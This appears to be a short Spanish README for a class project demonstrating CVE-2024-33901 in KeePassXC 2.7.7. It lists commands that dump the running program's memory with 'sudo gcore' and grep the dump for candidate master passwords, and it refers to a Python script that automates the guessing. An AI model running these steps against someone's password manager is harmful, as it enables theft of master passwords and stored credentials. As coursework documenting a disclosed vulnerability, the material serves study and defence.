
Programa corto que demuestra la vulnerabilidad CVE-2024-33901 en KeePassXC versión 2.7.7
Programa corto que demuestra la vulnerabilidad CVE-2024-33901 en KeePassXC versión 2.7.7
El informe para la clase podría necesitar el código fuente enlazado, por eso creé el repositorio para esto.
Esto se puede lograr obteniendo el PID, lo cual se puede hacer con este comando:
ps aux | grep keepassxc
Y luego ejecutando este comando: sudo gcore -o keepassxc_dump PID_HERE
Por ejemplo, si el PID que obtuviste fue 1234, entonces el comando tendría que ser:
sudo gcore -o keepassxc_dump 1234
3. Finalmente, puedes ejecutar este comando: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
Así que si el PID fuera 1234, el comando sería:
cat keepassxc_dump.1234 | strings | grep "password guess here"
Una vez que se crea el archivo de volcado de memoria, el ataque puede realizarse incluso si la base de datos se vuelve a bloquear o si KeePassXC está cerrado.
El código Python proporcionado realiza todos estos pasos e intenta múltiples adivinanzas de contraseña basándose en los archivos de texto proporcionados.